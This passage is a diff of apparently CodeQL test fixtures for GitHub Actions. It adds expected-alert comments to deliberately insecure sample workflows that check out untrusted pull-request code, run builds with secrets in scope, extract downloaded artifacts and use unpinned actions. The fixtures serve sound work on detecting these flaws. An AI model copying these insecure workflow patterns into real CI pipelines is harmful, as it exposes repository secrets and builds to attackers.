github.event.issue.number) || '' }} + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml index 8c0865f598c..6dd5205c08e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml 
@@ -30,7 +30,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: @@ -47,4 +47,4 @@ jobs: echo "branch=$REF" >> $GITHUB_OUTPUT - uses: actions/checkout@v4 with: - ref: ${{ steps.vars.outputs.branch }} + ref: ${{ steps.vars.outputs.branch }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml index ac013eb6e2f..b25d53c739e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -27,12 +27,12 @@ jobs: with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/checkout@v4 + - uses: actions/checkout@v4 # $ Alert[actions/untrusted-checkout/high] with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} token: ${{ secrets.GITHUB_TOKEN }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Get Info from comment @@ -59,7 +59,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test3: + test3: # $ Alert[actions/untrusted-checkout/high] if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request runs-on: ubuntu-latest steps: @@ -80,7 +80,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') runs-on: ubuntu-latest steps: @@ -97,7 +97,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-20.04 steps: - id: request 
@@ -111,4 +111,4 @@ jobs: with: token: ${{ secrets.GITHUB_TOKEN }} repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} - ref: ${{fromJson(steps.request.outputs.data).head.ref}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml index 8485ad0ed67..0831bc9217c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -23,15 +23,15 @@ jobs: route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor patch wildcard + - name: Checkout PR minor patch wildcard # $ Alert[actions/unversioned-immutable-action] - uses: actions/checkout@v2.x.xx with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor wildcard incomplete patch + - name: Checkout PR minor wildcard incomplete patch # $ Alert[actions/untrusted-checkout/high] Alert[actions/unversioned-immutable-action] uses: actions/checkout@v2.x. - - name: Run latest action - uses: some-action/some-repo@latest + - name: Run latest action # $ Alert[actions/unversioned-immutable-action] + uses: some-action/some-repo@latest # $ Alert[actions/unpinned-tag] with: some-input: some-value - name: run the latest checkout action diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml index 56bb143cf36..32cef70963a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -17,11 +17,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml index 6014d08ed80..fef28af7925 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -13,16 +13,16 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] - run: | npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] Sink[actions/untrusted-checkout/critical] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml index 49908b7b4c5..47aa7725a81 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml 
@@ -33,7 +33,7 @@ jobs: - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 with: egress-policy: audit - - uses: rlespinasse/github-slug-action@v4 + - uses: rlespinasse/github-slug-action@v4 # $ Alert[actions/unpinned-tag] with: short-length: 8 - name: Check for profanities in issue body @@ -100,7 +100,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 @@ -109,7 +109,7 @@ jobs: npm run lint npm start - toppings: + toppings: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest timeout-minutes: 1 if: github.event_name == 'pull_request' @@ -126,11 +126,11 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml index b539c562084..dbeeb1e0eeb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -26,8 +26,8 @@ jobs: fetch-depth: 1 ref: ${{ steps.set_ref.outputs.ref }} - - name: "setup ruby" + - name: "setup ruby" # $ Alert[actions/untrusted-checkout/medium] if: success() - uses: "ruby/setup-ruby@v1" + uses: "ruby/setup-ruby@v1" # $ Alert[actions/unpinned-tag] with: ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml index 6900c3bc23f..4035b3fb464 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -33,9 +33,9 @@ jobs: # For PRs make sure to checkout the PR branch ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll + - name: Build with Jekyll # $ Alert[actions/unversioned-immutable-action] uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ @@ -44,7 +44,7 @@ jobs: # Automatically uploads an artifact from the './_site' directory by default uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 # Deployment job - deploy: + deploy: # $ Alert[actions/unversioned-immutable-action] environment: name: 'Pages Preview' url: ${{ steps.deployment.outputs.page_url }} @@ -60,4 +60,4 @@ jobs: id: deployment uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 with: - preview: 'true' + preview: 'true' # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml index 5501beb9ea2..9ecc8c2367b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml 
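Review bot: In poc.yml the `unversioned-immutable-action` expectations land on `deploy:` (a job key) and on `preview: 'true'`, lines that have nothing to do with the `uses: actions/upload-pages-artifact@…` and `uses: actions/deploy-pages@…` steps above them, so a reader of the fixture cannot tell which step each alert belongs to. This looks like the inline-expectation framework matching on the end line of the step's YAML location, which presumably extends to the line before the next node — confirm against the query's location logic rather than the annotation placement. A one-line comment near the top of the workflow, such as `# NOTE: $ expectations sit on the last line of the flagged step's YAML node, which may be the following key`, would stop these from reading as alerts on the job or on the `preview` input; the same placement appears on `test:` in auto_ci.yml and `toppings:` in level0.yml.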
@@ -39,12 +39,12 @@ jobs: with: ref: ${{ steps.branch-deploy.outputs.ref }} - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 # $ Alert[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} with: bundler-cache: true - - name: bootstrap + - name: bootstrap # $ Sink[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} run: script/bootstrap @@ -55,4 +55,4 @@ jobs: set -o pipefail script/deploy | tee deploy.out bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out + rm deploy.out # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml index 4d5ae1f528c..39fc63beb3f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml index 061ff7d02c5..a89f4ef3031 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml 
@@ -57,7 +57,7 @@ jobs: - name: checkout uses: actions/checkout@v3 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} - - uses: amannn/action-semantic-pull-request@v5 + - uses: amannn/action-semantic-pull-request@v5 # $ Alert[actions/unpinned-tag] if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} with: requireScope: false @@ -106,7 +106,7 @@ jobs: persist-credentials: false submodules: false lfs: true - - uses: actionsdesk/lfs-warning@v3.2 + - uses: actionsdesk/lfs-warning@v3.2 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] name: lfs-warning with: labelName: lfs-detected! @@ -141,11 +141,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable @@ -219,12 +219,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-outputs - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" build-all-checks-packages: 
@@ -253,12 +253,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-checks - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" @@ -287,12 +287,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: build-all-deps-packages + - name: build-all-deps-packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-deps - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" draft-release-check: @@ -344,7 +344,7 @@ jobs: with: fetch-depth: 0 - name: Login to DockerHub - uses: docker/login-action@v2 + uses: docker/login-action@v2 # $ Alert[actions/unpinned-tag] with: username: ${{ secrets.DOCKER_HUB_USERNAME }} password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} @@ -353,7 +353,7 @@ jobs: nix run .#generate-release-artifacts --print-build-logs - name: Release artifacts - uses: softprops/action-gh-release@v1 + uses: softprops/action-gh-release@v1 # $ Alert[actions/unpinned-tag] with: draft: true prerelease: false 
@@ -388,11 +388,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] uses: "./.github/templates/watch-exec" with: command: nix -- build .#all - - name: Publish cmc-api to docker hub + - name: Publish cmc-api to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-cmc-api.tar.gz @@ -401,7 +401,7 @@ jobs: name: cmc-api artifact: cmc-api:latest - - name: Publish devnet-xc to docker hub + - name: Publish devnet-xc to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-devnet-xc.tar.gz @@ -411,7 +411,7 @@ jobs: artifact: devnet-xc:latest tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} - - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz @@ -420,7 +420,7 @@ jobs: name: hyperspace-composable-rococo-picasso-rococo artifact: hyperspace-composable-rococo-picasso-rococo:latest - - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz @@ -429,7 +429,7 @@ jobs: name: hyperspace-composable-polkadot-picasso-kusama artifact: hyperspace-composable-polkadot-picasso-kusama:latest - mantis-e2e: + mantis-e2e: # $ Sink[actions/untrusted-checkout/critical] name: mantis-e2e outputs: ok: ${{ steps.ok.outputs.ok }} 
@@ -446,11 +446,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml index d8381176fd2..54f740735e2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -17,7 +17,7 @@ jobs: ref: ${{ github.head_ref }} token: ${{ secrets.DOCUBOT_REPO_PAT }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] ./cmd env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml index 72db8c29370..407659f09db 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml 
@@ -17,7 +17,7 @@ jobs: GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - if: github.event_name == 'workflow_run' + - if: github.event_name == 'workflow_run' # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/download-artifact - id: resolve-step env:
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml
index 3b8a6d6dd62..b338fbc5f16 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml
@@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml
index e8b5466f751..8bdb8fc75ed 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml
@@ -22,12 +22,12 @@ jobs: with: ref: ${{ github.event.after || github.event.pull_request.head.sha }} - - name: Build + - name: Build # $ Alert[actions/untrusted-checkout/critical] working-directory: custom-payment-flow/client/android-kotlin run: | ./gradlew build - dependabot-auto-merge: + dependabot-auto-merge: # $ Sink[actions/untrusted-checkout/critical] if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} needs: android_build permissions: 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml
index 16bb6bf876c..448654fe45d 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml
@@ -87,8 +87,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Sink[actions/untrusted-checkout/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml
index 878b8377961..9f0ee5cf96d 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml
@@ -89,7 +89,7 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }}
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml
index 0a73e86d5fc..c8a68d73e58 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml
@@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check repository permission for user - uses: sushichop/action-repository-permission@v2 + uses: sushichop/action-repository-permission@v2 # $ Alert[actions/unpinned-tag] with: required-permission: write reaction-permitted: rocket @@ -22,7 +22,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/head fetch-depth: 0 - - uses: actions/setup-node@v3 + - uses: actions/setup-node@v3 # $ Alert[actions/untrusted-checkout/high] with: node-version: 16 - name: Danger JS diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml index 6f03a0e966a..15ab46cc70a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -102,13 +102,13 @@ jobs: if: contains(github.event.comment.body, '/rollback') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - - name: Checkout PR branch + - name: Checkout PR branch # $ Alert[actions/unversioned-immutable-action] if: contains(github.event.comment.body, '/deploy') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Alert[actions/unversioned-immutable-action] id: environment shell: bash env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml index 0be96a4140e..ef42bbb4a3c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml 
@@ -62,7 +62,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/unversioned-immutable-action] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -112,7 +112,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/unversioned-immutable-action] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml index f679b772e34..d5de91480cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -16,8 +16,8 @@ jobs: ref: ${{ github.event.workflow_run.head_branch }} fetch-depth: 0 - - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + - name: SonarCloud Scan # $ Alert[actions/untrusted-checkout/critical] + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml index 6347db51e3c..96de593004a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml 
@@ -30,12 +30,12 @@ jobs: let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); - - name: Unzip artifacts + - name: Unzip artifacts # $ Alert[actions/artifact-poisoning/critical] run: unzip rsc-pr-build-artifacts.zip - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml index 2f3b0bb876f..4cf7a49245c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -59,4 +59,4 @@ jobs: with: ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} - - run: ./bin/build-plugin-zip.sh + - run: ./bin/build-plugin-zip.sh # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml index c825cc73813..1404c559b0a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -29,7 +29,7 @@ jobs: run-id: ${{ github.event.workflow_run.id }} # Don't fail a build if the file doesn't exist continue-on-error: true - - name: Extract previously uploaded build scan content + - name: Extract previously uploaded build scan content # $ Alert[actions/artifact-poisoning/critical] if: ${{ steps.downloadBuildScan.outcome != 'failure'}} run: tar -xzf build-scan.tgz -C ~ - name: Publish 
@@ -37,6 +37,6 @@ jobs: # Don't fail a build if publishing fails continue-on-error: true run: | - ./gradlew buildScanPublishPrevious + ./gradlew buildScanPublishPrevious # $ Sink[actions/artifact-poisoning/critical] env: ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml index b1d776ef6c8..9b7a6c535c6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -18,5 +18,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ inputs.git_ref }} - - run: | - ./cmd + - run: | # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] + ./cmd # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml index 5f67fecc09a..16d84cd70f7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -17,4 +17,4 @@ jobs: - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 with: ref: ${{ github.head_ref }} - - run: make foo + - run: make foo # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml 